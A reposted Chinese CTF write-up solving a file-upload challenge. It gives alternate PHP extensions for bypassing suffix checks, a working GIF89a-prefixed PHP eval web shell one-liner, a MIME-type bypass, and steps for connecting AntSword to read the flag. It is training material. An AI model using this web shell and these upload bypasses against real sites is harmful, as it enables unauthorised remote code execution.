碼上快樂

相關內容    簡體    繁體

[極客大挑戰 2019]Upload

本文轉載自   查看原文   2020-02-02 20:39   1241    CTF刷題

0x00 知識點

一個常規上傳題目,知識點全都來自前幾天寫的文章:

https://www.cnblogs.com/wangtanzhi/p/12243206.html

1:某些情況下繞過后綴名檢測:

php,php3,php4,php5,phtml.pht
2:常用一句話:

GIF89a? <script language="php">eval($_REQUEST[shell])</script>

php5適用
3:文件類型繞過

改成image/jpeg

0x01 解題

做如下修改:

蟻劍連接:
http://3915f5e8-a730-4ca3-80c1-572b9cff8776.node3.buuoj.cn/upload/1.phtml
訪問:

文件太多了 我們直接在終端cat /flag

右鍵 虛擬終端:


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [極客大挑戰 2019]Upload [極客大挑戰 2019]Upload [極客大挑戰 2019]EasySQL [極客大挑戰 2019]PHP [極客大挑戰 2019]Http [極客大挑戰 2019]BabySQL [極客大挑戰 2019]FinalSQL [極客大挑戰 2019]LoveSQL [極客大挑戰 2019]Http [極客大挑戰 2019]Knife
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM